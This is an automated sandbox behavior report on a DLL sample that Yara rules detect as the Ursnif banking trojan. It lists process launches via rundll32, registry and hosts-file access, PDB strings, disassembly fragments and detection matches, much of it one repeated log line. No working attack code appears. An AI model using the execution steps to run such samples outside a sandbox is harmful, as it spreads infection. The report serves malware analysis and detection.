Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: fadfadfadad.dll	Jump to behavior

Source: hFGZpat9Mf.dll	Virustotal: Detection: 20%
Source: hFGZpat9Mf.dll	ReversingLabs: Detection: 32%

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 684
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER410A.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winDLL@6/6@4/7

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00708912 GetDiskFreeSpaceA,

0_2_00708912

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_007210CC GetLastError,FormatMessageA,

0_2_007210CC

Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3272

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00716C2C FindResourceA,

0_2_00716C2C

Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.261009852.0000000004A6B000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: advapi32.pdbl source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msvcp_win.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: version.pdb` source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: oleaut32.pdbv source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: version.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wsspicli.pdbj source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: comctl32v582.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: powrprof.pdbr source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: comctl32v582.pdbg source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0076B448 push dword ptr [0076FF08h]; ret	0_2_0076BDEF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_007080C0 push ecx; mov dword ptr [esp], ecx	0_2_007080C5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0070E154 push 0070E180h; ret	0_2_0070E178
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0071611C push ecx; mov dword ptr [esp], edx	0_2_00716121
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0072A1E4 push 0072A23Dh; ret	0_2_0072A235
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_007061A2 push 007061D0h; ret	0_2_007061C8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_007061A4 push 007061D0h; ret	0_2_007061C8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0071627C push ecx; mov dword ptr [esp], edx	0_2_00716281
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0071E254 push 0071E280h; ret	0_2_0071E278
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00716238 push ecx; mov dword ptr [esp], edx	0_2_0071623D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0070621C push 00706248h; ret	0_2_00706240
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_007182BC push ecx; mov dword ptr [esp], ecx	0_2_007182C1
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00714558 push 007145A5h; ret	0_2_0071459D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0072C64C push 0072C6C1h; ret	0_2_0072C6B9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00714610 push 0071463Ch; ret	0_2_00714634
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0072C6C4 push 0072C71Dh; ret	0_2_0072C715
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0072A85C push 0072A89Fh; ret	0_2_0072A897
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0072A8D4 push 0072A900h; ret	0_2_0072A8F8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0071C8C0 push ecx; mov dword ptr [esp], edx	0_2_0071C8C2
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0072A90C push 0072A944h; ret	0_2_0072A93C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0072A9A0 push 0072A9CCh; ret	0_2_0072A9C4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0072AA70 push 0072AAA3h; ret	0_2_0072AA9B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0072AAD0 push 0072AAFCh; ret	0_2_0072AAF4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00728AD4 push 00728B12h; ret	0_2_00728B0A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00728B54 push 00728B8Ch; ret	0_2_00728B84
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0072AB20 push 0072AB63h; ret	0_2_0072AB5B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00728B1C push 00728B48h; ret	0_2_00728B40
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0072ABEC push 0072AC38h; ret	0_2_0072AC30
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0072AB88 push 0072ABCBh; ret	0_2_0072ABC3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0072AC44 push 0072AC8Fh; ret	0_2_0072AC87
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00706CD8 push ecx; mov dword ptr [esp], eax	0_2_00706CD9

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_0072921C CreatePopupMenu,MITGetCursorUpdateHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetDebugErrorLevel,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxIndirectParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,MITUpdateInputGlobals,

0_2_0072921C

Hooking and other Techniques for Hiding and Protection

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 988, type: MEMORYSTR
Source: Yara match	File source: 3.2.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.ee0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.9e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.1080000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.ed0184.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.9e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.2500000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.890184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.1080000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.2a094a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.8a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.2a094a0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
